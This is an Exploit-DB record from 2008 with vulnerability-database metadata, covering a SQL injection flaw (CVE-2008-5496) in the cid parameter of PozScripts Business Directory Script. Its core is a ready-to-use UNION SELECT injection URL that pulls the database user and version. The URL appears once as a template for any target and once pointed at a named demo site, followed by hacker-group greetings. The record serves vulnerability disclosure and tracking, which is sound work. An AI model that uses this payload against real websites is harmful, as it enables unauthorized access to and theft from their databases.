ID EDB-ID:7098
Type exploitdb
Reporter Hussin X
Modified 2008-11-11T00:00:00
Description
PozScripts Business Directory Script (cid) Remote SQL Injection Vuln. CVE-2008-5496. Webapps exploit for php platform
|___________________________________________________
|
| Business Directory Script ( cid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|-------------------- Hussin X -------------------
|
| Author: Hussin X
|
| Home : WwW.IQ-ty.CoM
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|
| script : http://www.pozscripts.com/product_details.php?item_id=6
|
| DorK : :)
|___________________________________________________
Exploit:
________
www.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--
Demo
________
http://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user
(),0x3e,version()),3,4,5--
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|_____________________________________________________________________
Im IRAQi | Im TrYaGi
# milw0rm.com [2008-11-11]
{"hash": "803b565fb0b35f8e8baef7bbf804354c2784bd2e512d61d4f9af93e9ee1133e2", "id": "EDB-ID:7098", "lastseen": "2016-02-01T01:24:28", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/7098/", "description": "PozScripts Business Directory Script (cid) Remote SQL Injection Vuln. CVE-2008-5496. Webapps exploit for php platform", "title": "PozScripts Business Directory Script cid Remote SQL Injection Vuln", "sourceData": "|___________________________________________________\n|\n| Business Directory Script ( cid) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|-------------------- Hussin X -------------------\n|\n| Author: Hussin X\n|\n| Home : WwW.IQ-ty.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|___________________________________________________\n|\n| script : http://www.pozscripts.com/product_details.php?item_id=6\n|\n| DorK : :) \n|___________________________________________________\n\nExploit:\n________\n\n\n\nwww.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--\n\n\n\nDemo\n________\n\nhttp://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user\n\n(),0x3e,version()),3,4,5--\n\n\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K\n|_____________________________________________________________________\n\n\n Im IRAQi | Im TrYaGi\n\n# milw0rm.com [2008-11-11]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-5496"], "published": "2008-11-11T00:00:00", "osvdbidlist": ["49822"], "references": [], "reporter": "Hussin X", "modified": "2008-11-11T00:00:00", "href": "https://www.exploit-db.com/exploits/7098/"}
{"result": {"cve": [{"id": "CVE-2008-5496", "type": "cve", "title": "CVE-2008-5496", "description": "SQL injection vulnerability in showcategory.php in PozScripts Business Directory Script allows remote attackers to execute arbitrary SQL commands via the cid parameter.", "published": "2008-12-12T11:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5496", "cvelist": ["CVE-2008-5496"], "lastseen": "2017-09-29T14:26:14"}]}}
